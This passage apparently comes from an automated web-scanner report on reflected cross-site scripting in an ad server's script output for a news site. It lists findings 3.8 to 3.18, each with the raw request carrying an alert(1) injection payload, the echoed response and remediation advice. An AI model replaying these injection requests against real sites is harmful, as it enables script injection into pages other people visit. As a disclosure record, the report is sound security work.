GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C9d7a9'-alert(1)-'b1576cde699&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:49:13 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 685
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C9d7a9'-alert(1)-'b1576cde699&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=http://save.ingdirect.com/promo/promo_set.asp?p= ...[SNIP]...
3.8. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [sn1 parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N3282.nytimes.comSD6440/B3948326.5
Issue detail
The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae5e4'-alert(1)-'aa8ce901cf was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61ae5e4'-alert(1)-'aa8ce901cf&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:51:48 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 684
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/122/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nyt ...[SNIP]... opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61ae5e4'-alert(1)-'aa8ce901cf&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19"> ...[SNIP]...
3.9. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [sn2 parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N3282.nytimes.comSD6440/B3948326.5
Issue detail
The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c82b8'-alert(1)-'a4d6eda3c22 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178c82b8'-alert(1)-'a4d6eda3c22&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:50:27 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 685
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178c82b8'-alert(1)-'a4d6eda3c22&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19"> ...[SNIP]...
3.10. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [snr parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N3282.nytimes.comSD6440/B3948326.5
Issue detail
The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cafe4'-alert(1)-'e519a003fdb was submitted in the snr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclickcafe4'-alert(1)-'e519a003fdb&snx=1289611247&sn1=70abef3d/22b41b61&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:50:53 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 685
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nyt ...[SNIP]... com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclickcafe4'-alert(1)-'e519a003fdb&snx=1289611247&sn1=70abef3d/22b41b61&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19"> ...[SNIP]...
3.11. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [snx parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N3282.nytimes.comSD6440/B3948326.5
Issue detail
The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea498'-alert(1)-'f486d2b26f6 was submitted in the snx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247ea498'-alert(1)-'f486d2b26f6&sn1=70abef3d/22b41b61&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:51:19 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 685
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nyt ...[SNIP]... _click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247ea498'-alert(1)-'f486d2b26f6&sn1=70abef3d/22b41b61&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19"> ...[SNIP]...
3.12. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [ad parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N5295.NewYorkTimes/B4885922
Issue detail
The value of the ad request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c42e"-alert(1)-"eccd2896247 was submitted in the ad parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x901c42e"-alert(1)-"eccd2896247&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:50:38 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... %7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x901c42e"-alert(1)-"eccd2896247&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa"); var ...[SNIP]...
3.13. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [ad parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N5295.NewYorkTimes/B4885922
Issue detail
The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 720f7'-alert(1)-'6112183b0f2 was submitted in the ad parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90720f7'-alert(1)-'6112183b0f2&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:50:43 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... %7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90720f7'-alert(1)-'6112183b0f2&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa\"> ...[SNIP]...
3.14. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [camp parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N5295.NewYorkTimes/B4885922
Issue detail
The value of the camp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40c72"-alert(1)-"dbe1a9ec6e was submitted in the camp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt240c72"-alert(1)-"dbe1a9ec6e&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:50:13 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6747
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt240c72"-alert(1)-"dbe1a9ec6e&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5 ...[SNIP]...
3.15. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [camp parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N5295.NewYorkTimes/B4885922
Issue detail
The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d10f2'-alert(1)-'f317ac05d12 was submitted in the camp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2d10f2'-alert(1)-'f317ac05d12&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:50:17 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2d10f2'-alert(1)-'f317ac05d12&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5 ...[SNIP]...
3.16. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [goto parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N5295.NewYorkTimes/B4885922
Issue detail
The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8125"-alert(1)-"445d6a35394 was submitted in the goto parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=a8125"-alert(1)-"445d6a35394 HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:52:54 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... w.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=a8125"-alert(1)-"445d6a35394http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ...[SNIP]...
3.17. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [goto parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N5295.NewYorkTimes/B4885922
Issue detail
The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9fccb'-alert(1)-'facab827203 was submitted in the goto parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=9fccb'-alert(1)-'facab827203 HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:52:59 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... w.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=9fccb'-alert(1)-'facab827203http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa\"> ...[SNIP]...
3.18. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N5295.NewYorkTimes/B4885922
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c0fb'-alert(1)-'c291a30757 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
